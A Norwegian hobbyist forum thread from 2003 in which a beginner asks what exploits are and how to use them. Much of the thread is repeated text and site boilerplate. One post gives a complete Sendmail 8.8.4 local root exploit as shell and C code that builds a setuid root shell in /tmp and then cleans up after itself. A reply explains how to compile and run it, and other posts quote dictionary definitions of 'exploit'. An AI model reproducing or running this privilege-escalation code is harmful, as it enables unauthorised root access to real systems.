Har noen spørsmål:
- hva er det
- hva kan di gjøre
- hvordan bruker man dem
Svar!
- hva er det
- hva kan di gjøre
- hvordan bruker man dem
Svar!
LOGG INN
... eller du kan registrere deg nå
Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang.
Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
|
12
1418
|
noen som har smbdie da? slik jeg får testet.
så vidt jeg har fått med meg er exploits kode som skal brukes på et eller annet vis. jeg fant denne exploiten, men jeg vet ikke hvordan den skal brukes:
This exploit is known as Sendmail v.8.8.4
It creates a suid program /tmp/x that calls shell as root. This is how you set it up:
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include<stdio.h>
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
Of exploits benytter seg bare av buffer overflow?
men det viktigste for meg et at noen forklarer hvordan koden brukes.
så vidt jeg har fått med meg er exploits kode som skal brukes på et eller annet vis. jeg fant denne exploiten, men jeg vet ikke hvordan den skal brukes:
This exploit is known as Sendmail v.8.8.4
It creates a suid program /tmp/x that calls shell as root. This is how you set it up:
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include<stdio.h>
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
Of exploits benytter seg bare av buffer overflow?
men det viktigste for meg et at noen forklarer hvordan koden brukes.
En exploit er et program som utnytter seg av sikkerhetshull for å oppnå ettellerannet... feks, at kommandoer kan kjøres fra rootbruker. Det er naturligvis ingen fasit på hvordan eksploiter brukes, det er opp til den som har laget den... mange exploiter blir releaset med "feil" i koden slik at ikke scriptkiddies skal klare å bruke dem.. litt genialt egentlig
SiraX; Det er C-kode.. copy/paste inn i en .c-fil, kompiler og kjør.. tror det er fordel om du kan C
SiraX: edit; sorry, leste ikke gjennom koden før jeg skrev.. det er selvfølgelig 3 kildefiler
SiraX; Det er C-kode.. copy/paste inn i en .c-fil, kompiler og kjør.. tror det er fordel om du kan C
SiraX: edit; sorry, leste ikke gjennom koden før jeg skrev.. det er selvfølgelig 3 kildefiler
Sist endret av nalle; 26. juni 2003 kl. 23:36.
exploit
<security> A security hole or an instance of taking advantage
of a security hole.
"[...] hackers say exploit. sysadmins say hole"
-- Mike Emke (http://emke.com/)
Emke reports that the stress is on the second syllable. If
this is true, this may be a case of of hackerly zero-deriving
verbs (especially instantials) from nouns, akin to "write" as
a noun to describe an instance of a disk drive writing to a
disk.
(2001-11-24)
Source: The Free On-line Dictionary of Computing, © 1993-2003 Denis Howe
edit: også fannt jeg dette og.
exploit
n. [originally cracker slang] 1. A vulnerability in
software that can be used for breaking security or otherwise
attacking an Internet host over the network. The Ping O' Death is
a famous exploit. 2. More grammatically, a program that exploits an
exploit in sense 1,
<security> A security hole or an instance of taking advantage
of a security hole.
"[...] hackers say exploit. sysadmins say hole"
-- Mike Emke (http://emke.com/)
Emke reports that the stress is on the second syllable. If
this is true, this may be a case of of hackerly zero-deriving
verbs (especially instantials) from nouns, akin to "write" as
a noun to describe an instance of a disk drive writing to a
disk.
(2001-11-24)
Source: The Free On-line Dictionary of Computing, © 1993-2003 Denis Howe
edit: også fannt jeg dette og.
exploit
n. [originally cracker slang] 1. A vulnerability in
software that can be used for breaking security or otherwise
attacking an Internet host over the network. The Ping O' Death is
a famous exploit. 2. More grammatically, a program that exploits an
exploit in sense 1,
|
|